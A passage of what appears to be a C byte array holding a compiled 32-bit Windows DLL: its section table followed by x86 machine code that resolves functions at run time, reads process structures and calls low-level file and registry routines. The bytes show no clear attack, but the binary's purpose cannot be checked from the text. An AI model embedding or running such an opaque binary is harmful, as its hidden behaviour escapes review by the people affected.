0,0x00,0x00,0x00,0xC0,0x82,0x00,0x00,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xF0,0xE0,0x00,0x00,0xB4,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x00,0x00,0xA4,0x5D,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x5E,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x60,0x2E,0x64,0x61,0x74,0x61,0x00,0x00,0x00,0xA0,0x00,0x00,0x00,0x00,0x70,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x62,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x64,0x61,0x74,0x61,0x00,0x00,0x54,0x06,0x00,0x00,0x00,0x80,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x64,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2F,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x14,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x16,0x00,0x00,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x62,0x73,0x73,0x00,0x00,0x00,0x00,0x80,0x1A,0x00,0x00,0x00,0xB0,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0xC0,0x2E,0x65,0x64,0x61,0x74,0x61,0x00,0x00,0x52,0x00,0x00,0x00,0x00,0xD0,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x82,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x40,0x2E,0x69,0x64,0x61,0x74,0x61,0x00,0x00,0x98,0x04,0x00,0x00,0x00,0xE0,0x00,0x00,0x00,0x06,0x00,0x00,0x00,0x84,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x43,0x52,0x54,0x00,0x00,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0xF0,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x8A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x74,0x6C,0x73,0x00,0x00,0x00,0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x02,0x00,0x00,0x00,0x8C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0xC0,0x2E,0x72,0x65,0x6C,0x6F,0x63,0x00,0x00,0xF8,0x02,0x00,0x00,0x00,0x10,0x01,0x00,0x00,0x04,0x00,0x00,0x00,0x8E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x42,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x83,0xEC,0x18,0xC7,0x04,0x24,0x00,0xB0,0x88,0x6C,0xE8,0x3E,0x5B,0x00,0x00,0xC9,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0x8B,0x45,0x0C,0x85,0xC0,0x75,0x70,0xA1,0x0C,0xB0,0x88,0x6C,0x31,0xD2,0x85,0xC0,0x7E,0x55,0x83,0xE8,0x01,0x8B,0x3D,0x20,0xE1,0x88,0x6C,0x31,0xF6,0xA3,0x0C,0xB0,0x88,0x6C,0xEB,0x0F,0x8D,0x76,0x00,0xC7,0x04,0x24,0xE8,0x03,0x00,0x00,0xFF,0xD7,0x83,0xEC,0x04,0xBA,0x01,0x00,0x00,0x00,0x89,0xF0,0xF0,0x0F,0xB1,0x15,0x24,0xCA,0x88,0x6C,0x89,0xC3,0x85,0xC0,0x75,0xDF,0xA1,0x28,0xCA,0x88,0x6C,0x83,0xF8,0x02,0x0F,0x84,0xC9,0x00,0x00,0x00,0xC7,0x04,0x24,0x1F,0x00,0x00,0x00,0xE8,0x35,0x5C,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x8D,0x65,0xF4,0x89,0xD0,0x5B,0x5E,0x5F,0x5D,0xC2,0x0C,0x00,0x8D,0x74,0x26,0x00,0x83,0xF8,0x01,0x75,0xE6,0x64,0xA1,0x18,0x00,0x00,0x00,0x8B,0x35,0x20,0xE1,0x88,0x6C,0x8B,0x78,0x04,0x31,0xDB,0xEB,0x1C,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x39,0xC7,0x0F,0x84,0xA8,0x00,0x00,0x00,0xC7,0x04,0x24,0xE8,0x03,0x00,0x00,0xFF,0xD6,0x83,0xEC,0x04,0x89,0xD8,0xF0,0x0F,0xB1,0x3D,0x24,0xCA,0x88,0x6C,0x85,0xC0,0x75,0xDE,0x31,0xDB,0xA1,0x28,0xCA,0x88,0x6C,0x83,0xF8,0x01,0x0F,0x84,0xEE,0x00,0x00,0x00,0xA1,0x28,0xCA,0x88,0x6C,0x85,0xC0,0x0F,0x84,0x91,0x00,0x00,0x00,0xA1,0x28,0xCA,0x88,0x6C,0x83,0xF8,0x01,0x0F,0x84,0xAB,0x00,0x00,0x00,0x85,0xDB,0x74,0x6F,0xA1,0xBC,0x82,0x88,0x6C,0x85,0xC0,0x74,0x1A,0x8B,0x55,0x10,0xC7,0x44,0x24,0x04,0x02,0x00,0x00,0x00,0x89,0x54,0x24,0x08,0x8B,0x55,0x08,0x89,0x14,0x24,0xFF,0xD0,0x83,0xEC,0x0C,0x83,0x05,0x0C,0xB0,0x88,0x6C,0x01,0xBA,0x01,0x00,0x00,0x00,0xE9,0x4B,0xFF,0xFF,0xFF,0x8D,0x76,0x00,0xC7,0x04,0x24,0x00,0xB0,0x88,0x6C,0xE8,0xFC,0x5A,0x00,0x00,0xC7,0x05,0x28,0xCA,0x88,0x6C,0x00,0x00,0x00,0x00,0x87,0x1D,0x24,0xCA,0x88,0x6C,0xE9,0x22,0xFF,0xFF,0xFF,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xBB,0x01,0x00,0x00,0x00,0xE9,0x6A,0xFF,0xFF,0xFF,0x8D,0xB6,0x00,0x00,0x00,0x00,0x87,0x1D,0x24,0xCA,0x88,0x6C,0xEB,0x89,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0xC7,0x05,0x28,0xCA,0x88,0x6C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x10,0xF0,0x88,0x6C,0xC7,0x04,0x24,0x08,0xF0,0x88,0x6C,0xE8,0x1A,0x5B,0x00,0x00,0xE9,0x4C,0xFF,0xFF,0xFF,0x2E,0x8D,0x74,0x26,0x00,0xC7,0x44,0x24,0x04,0x04,0xF0,0x88,0x6C,0xC7,0x04,0x24,0x00,0xF0,0x88,0x6C,0xE8,0xFC,0x5A,0x00,0x00,0xC7,0x05,0x28,0xCA,0x88,0x6C,0x02,0x00,0x00,0x00,0xE9,0x32,0xFF,0xFF,0xFF,0x2E,0x8D,0x74,0x26,0x00,0xC7,0x04,0x24,0x1F,0x00,0x00,0x00,0xE8,0xD4,0x5A,0x00,0x00,0xE9,0x0E,0xFF,0xFF,0xFF,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x57,0x89,0xCF,0x56,0x89,0xC6,0x53,0x89,0xD3,0x83,0xEC,0x2C,0x89,0x15,0x88,0x70,0x88,0x6C,0x85,0xD2,0x75,0x77,0xA1,0x0C,0xB0,0x88,0x6C,0x85,0xC0,0x74,0x4E,0xE8,0x09,0x4F,0x00,0x00,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x42,0x4B,0x00,0x00,0x83,0xEC,0x0C,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0xE8,0xA2,0x58,0x00,0x00,0x83,0xEC,0x0C,0x89,0x45,0xE4,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0xE8,0xBC,0xFD,0xFF,0xFF,0x8B,0x55,0xE4,0x83,0xEC,0x0C,0x85,0xC0,0x75,0x04,0x66,0x90,0x31,0xD2,0xC7,0x05,0x88,0x70,0x88,0x6C,0xFF,0xFF,0xFF,0xFF,0x8D,0x65,0xF4,0x89,0xD0,0x5B,0x5E,0x5F,0x5D,0xC3,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x66,0x90,0xE8,0x9B,0x4E,0x00,0x00,0x8D,0x43,0xFF,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0x83,0xF8,0x01,0x77,0x48,0xE8,0x73,0xFD,0xFF,0xFF,0x83,0xEC,0x0C,0x85,0xC0,0x74,0xBC,0x89,0x7C,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x34,0x24,0xE8,0x2C,0x58,0x00,0x00,0x83,0xEC,0x0C,0x85,0xC0,0x74,0x45,0x83,0xFB,0x01,0x74,0x68,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x02,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x99,0x4A,0x00,0x00,0x83,0xEC,0x0C,0x89,0xC2,0xEB,0x87,0x2E,0x8D,0x74,0x26,0x00,0xE8,0x88,0x4A,0x00,0x00,0x83,0xEC,0x0C,0x89,0xC2,0x83,0xFB,0x03,0x0F,0x85,0x6F,0xFF,0xFF,0xFF,0xE9,0x36,0xFF,0xFF,0xFF,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x83,0xFB,0x01,0x0F,0x85,0x57,0xFF,0xFF,0xFF,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0xF3,0xFC,0xFF,0xFF,0x83,0xEC,0x0C,0xE9,0x3B,0xFF,0xFF,0xFF,0x8D,0x76,0x00,0xE8,0x23,0x4B,0x00,0x00,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x2C,0x4A,0x00,0x00,0x83,0xEC,0x0C,0x89,0xC2,0x85,0xC0,0x0F,0x85,0x14,0xFF,0xFF,0xFF,0x89,0x45,0xE4,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x08,0x4A,0x00,0x00,0x83,0xEC,0x0C,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x64,0x57,0x00,0x00,0x83,0xEC,0x0C,0x89,0x7C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x34,0x24,0xE8,0x7D,0xFC,0xFF,0xFF,0x8B,0x55,0xE4,0x83,0xEC,0x0C,0xE9,0xC4,0xFE,0xFF,0xFF,0x66,0x90,0x55,0x89,0xE5,0x83,0xEC,0x08,0xC7,0x05,0x3C,0xCA,0x88,0x6C,0x00,0x00,0x00,0x00,0x8B,0x4D,0x10,0x8B,0x55,0x0C,0x8B,0x45,0x08,0xE8,0x32,0xFE,0xFF,0xFF,0xC9,0xC2,0x0C,0x00,0x2E,0x8D,0xB4,0x26,0x00,0x00,0x00,0x00,0x8D,0xB6,0x00,0x00,0x00,0x00,0x55,0x89,0xE5,0x83,0xEC,0x18,0x8B,0x45,0x08,0xC7,0x04,0x24,0x00,0xB0,0x88,0x6C,0x89,0x44,0x24,0x04,0xE8,0x87,0x57,0x00,0x00,0xC9,0xC3,0x90,0x90,0x90,0x90,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x1C,0xC7,0x04,0x24,0x00,0x80,0x88,0x6C,0xFF,0x15,0x00,0xE1,0x88,0x6C,0x83,0xEC,0x04,0x85,0xC0,0x74,0x73,0x89,0xC3,0xC7,0x04,0x24,0x00,0x80,0x88,0x6C,0xFF,0x15,0x1C,0xE1,0x88,0x6C,0x8B,0x3D,0x04,0xE1,0x88,0x6C,0x83,0xEC,0x04,0xA3,0x10,0xB0,0x88,0x6C,0xC7,0x44,0x24,0x04,0x13,0x80,0x88,0x6C,0x89,0x1C,0x24,0xFF,0xD7,0x83,0xEC,0x08,0x89,0xC6,0xC7,0x44,0x24,0x04,0x29,0x80,0x88,0x6C,0x89,0x1C,0x24,0xFF,0xD7,0x83,0xEC,0x08,0xA3,0x04,0x70,0x88,0x6C,0x85,0xF6,0x74,0x11,0xC7,0x44,0x24,0x04,0x14,0xB0,0x88,0x6C,0xC7,0x04,0x24,0xDC,0x90,0x88,0x6C,0xFF,0xD6,0xC7,0x04,0x24,0xA0,0x14,0x88,0x6C,0xE8,0x5E,0xFF,0xFF,0xFF,0x8D,0x65,0xF4,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xBE,0x00,0x00,0x00,0x00,0xEB,0xC0,0x8D,0x74,0x26,0x00,0x55,0x89,0xE5,0x83,0xEC,0x18,0xA1,0x04,0x70,0x88,0x6C,0x85,0xC0,0x74,0x09,0xC7,0x04,0x24,0xDC,0x90,0x88,0x6C,0xFF,0xD0,0xA1,0x10,0xB0,0x88,0x6C,0x85,0xC0,0x74,0x0C,0x89,0x04,0x24,0xFF,0x15,0xF8,0xE0,0x88,0x6C,0x83,0xEC,0x04,0xC9,0xC3,0x90,0x55,0x89,0xE5,0x83,0xEC,0x18,0x8B,0x45,0x08,0x89,0x04,0x24,0xA1,0x90,0xE1,0x88,0x6C,0xFF,0xD0,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x53,0x81,0xEC,0x40,0x02,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x8D,0x95,0xD8,0xFD,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x82,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0x83,0x7D,0x08,0x00,0x0F,0x84,0xED,0x01,0x00,0x00,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8D,0x85,0xD8,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0xA2,0x57,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE8,0x89,0x54,0x24,0x10,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x04,0x00,0x00,0x89,0x04,0x24,0xE8,0x45,0x19,0x00,0x00,0x89,0x45,0xF0,0x81,0x7D,0xF0,0x1A,0x00,0x00,0x80,0x0F,0x84,0x99,0x01,0x00,0x00,0x83,0x7D,0xF0,0x00,0x0F,0x88,0x92,0x01,0x00,0x00,0x8B,0x45,0xE8,0x8D,0x55,0xE0,0x89,0x54,0x24,0x08,0x8D,0x55,0xE4,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xD8,0x0C,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0x51,0x01,0x00,0x00,0x8B,0x45,0xE4,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x75,0x54,0x8B,0x45,0xE4,0x85,0xC0,0x0F,0x84,0x41,0x01,0x00,0x00,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x20,0x57,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0xF8,0x00,0x00,0x00,0x8B,0x45,0xE4,0x8B,0x40,0x04,0xC7,0x44,0x24,0x04,0x5C,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x3B,0x57,0x00,0x00,0x83,0xC0,0x02,0x89,0x45,0xEC,0x8D,0x85,0xD8,0xFD,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xA1,0x48,0xE1,0x88,0x6C,0xFF,0xD0,0x85,0xC0,0x75,0x67,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x44,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x99,0x56,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0xD8,0x0C,0x00,0x00,0x8B,0x55,0x0C,0x89,0x02,0x90,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x74,0xEB,0x60,0x8B,0x45,0xE4,0x85,0xC0,0x0F,0x84,0x8E,0xFE,0xFF,0xFF,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x2E,0x56,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xE9,0x45,0xFE,0xFF,0xFF,0x90,0xE9,0x3F,0xFE,0xFF,0xFF,0x90,0xE9,0x39,0xFE,0xFF,0xFF,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xE8,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xE8,0x89,0x04,0x24,0xE8,0xC5,0x17,0x00,0x00,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x4B,0x8B,0x45,0xE4,0x85,0xC0,0x74,0x44,0x8B,0x55,0xE0,0x8B,0x45,0xE4,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xA6,0x55,0x00,0x00,0x8B,0x5D,0xE4,0xA1,0x08,0xE1,0x88,0x6C,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x10,0xE1,0x88,0x6C,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x65,0xF8,0x5B,0x5F,0x5D,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0x8B,0x45,0x08,0x0F,0xB6,0x10,0x8B,0x45,0x08,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x38,0xC2,0x75,0x14,0x8B,0x45,0x08,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x3C,0x5C,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x56,0x8B,0x45,0x08,0x0F,0xB6,0x00,0x83,0xC8,0x20,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x60,0x7E,0x06,0x80,0x7D,0xFF,0x7A,0x7E,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x37,0x8B,0x45,0x08,0x83,0xC0,0x01,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x3A,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x1E,0x8B,0x45,0x08,0x83,0xC0,0x02,0x0F,0xB6,0x00,0x88,0x45,0xFF,0x80,0x7D,0xFF,0x5C,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x81,0xEC,0x28,0x02,0x00,0x00,0x8B,0x45,0x08,0x8B,0x40,0x04,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0xC7,0x44,0x24,0x04,0x44,0x80,0x88,0x6C,0x89,0x04,0x24,0xE8,0x1E,0x55,0x00,0x00,0x8B,0x45,0x0C,0x89,0x04,0x24,0xE8,0x49,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x1F,0xE8,0x97,0x00,0x00,0x00,0x8B,0x55,0x08,0x8B,0x52,0x04,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x89,0x44,0x24,0x04,0x89,0x14,0x24,0xE8,0xE8,0x54,0x00,0x00,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8B,0x45,0x0C,0x89,0x44,0x24,0x04,0x8D,0x85,0xF0,0xFD,0xFF,0xFF,0x89,0x04,0x24,0xE8,0x63,0x54,0x00,0x00,0x8B,0x45,0x08,0x8B,0x40,0x04,0xC7,0x44,0x24,0x08,0x04,0x01,0x00,0x00,0x8D,0x95,0xF0,0xFD,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xAB,0x54,0x00,0x00,0x8B,0x45,0x08,0x8B,0x40,0x04,0xC7,0x44,0x24,0x04,0x04,0x01,0x00,0x00,0x89,0x04,0x24,0xE8,0x2D,0x52,0x00,0x00,0x89,0xC2,0x8B,0x45,0x08,0x66,0x89,0x10,0x8B,0x45,0x08,0x0F,0xB7,0x00,0x8D,0x14,0x00,0x8B,0x45,0x08,0x66,0x89,0x10,0x8B,0x45,0x08,0x0F,0xB7,0x00,0x8D,0x50,0x02,0x8B,0x45,0x08,0x66,0x89,0x50,0x02,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x10,0xC7,0x45,0xF4,0x30,0x00,0x00,0x00,0x8B,0x45,0xF4,0x64,0x8B,0x00,0x89,0x45,0xF0,0x8B,0x45,0xF0,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x83,0xC0,0x10,0x8B,0x00,0x89,0x45,0xF8,0x8B,0x45,0xF8,0x8B,0x40,0x28,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0xBA,0x00,0x00,0x00,0x00,0x89,0x45,0xC8,0x89,0x55,0xCC,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x45,0xE0,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x24,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x20,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x05,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x80,0x00,0x00,0x00,0x8D,0x45,0xC8,0x89,0x44,0x24,0x10,0x8D,0x45,0xD0,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x16,0x01,0x12,0x00,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x01,0x16,0x00,0x00,0x89,0x45,0xF4,0x81,0x7D,0xF4,0x3A,0x00,0x00,0xC0,0x74,0x09,0x81,0x7D,0xF4,0x33,0x00,0x00,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x7C,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x6F,0x8B,0x45,0xF0,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x00,0x00,0x00,0x00,0x8B,0x55,0x10,0x89,0x54,0x24,0x18,0x8B,0x55,0x0C,0x89,0x54,0x24,0x14,0x8D,0x55,0xD0,0x89,0x54,0x24,0x10,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xB1,0x15,0x00,0x00,0x89,0x45,0xF4,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x9B,0x14,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x40,0x00